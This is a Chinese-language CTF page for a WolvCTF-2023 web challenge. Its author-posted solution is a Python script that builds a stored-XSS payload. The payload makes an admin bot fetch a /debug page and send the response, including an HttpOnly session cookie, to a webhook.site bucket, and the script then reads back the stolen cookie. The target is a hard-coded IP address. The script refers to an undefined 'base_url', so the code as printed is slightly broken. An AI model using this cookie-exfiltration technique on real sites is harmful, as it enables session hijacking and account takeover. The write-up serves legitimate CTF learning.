WolvCTF-2023 WEB 已通过
题目作者: 未知
一 血: heyile
一血奖励: 0金币
解 决: 23
提 示:
描 述: wctf{}
站长题解:
import requests
import os
import json
import urllib.parse
# setup bucket
token_path = ".webhook-site.token"
if os.path.exists(token_path):
with open(token_path, "r") as f:
bucket_id = f.read()
else:
r = requests.post("https://webhook.site/token")
bucket_id = r.json()["uuid"]
with open(token_path, "w") as f:
f.write(bucket_id)
bucket_url = f"https://webhook.site/{bucket_id}"
print(f"https://webhook.site/#!/{bucket_id}/")
# execute exploit
base_base = 'http://82.157.146.43:12762'
visit_base = f'{base_base}/visit?url='
show_base = f'{base_base}/zombie?show='
payload = f"""
<script>
(async function() {{
await fetch("{bucket_url}?cookie=" + JSON.stringify(await (await fetch("{base_url}/debug")).json()))
}})();
</script>
"""
target_url = visit_base + urllib.parse.quote_plus(show_base + urllib.parse.quote_plus(payload))
print("sending", target_url)
r = requests.get(target_url)
print(r.text)
# fetch result
r = requests.get(f"https://webhook.site/token/{bucket_id}/requests?sorting=newest")
print(json.loads(r.json()["data"][0]["query"]["cookie"])["cookie"])
httponly禁止了js读取cookie,要考虑绕过。由于debug页面的响应包含cookie,那就让后台管理访问debug页面,然后将页面响应回传。要注意js编码和要对页面响应内容编码。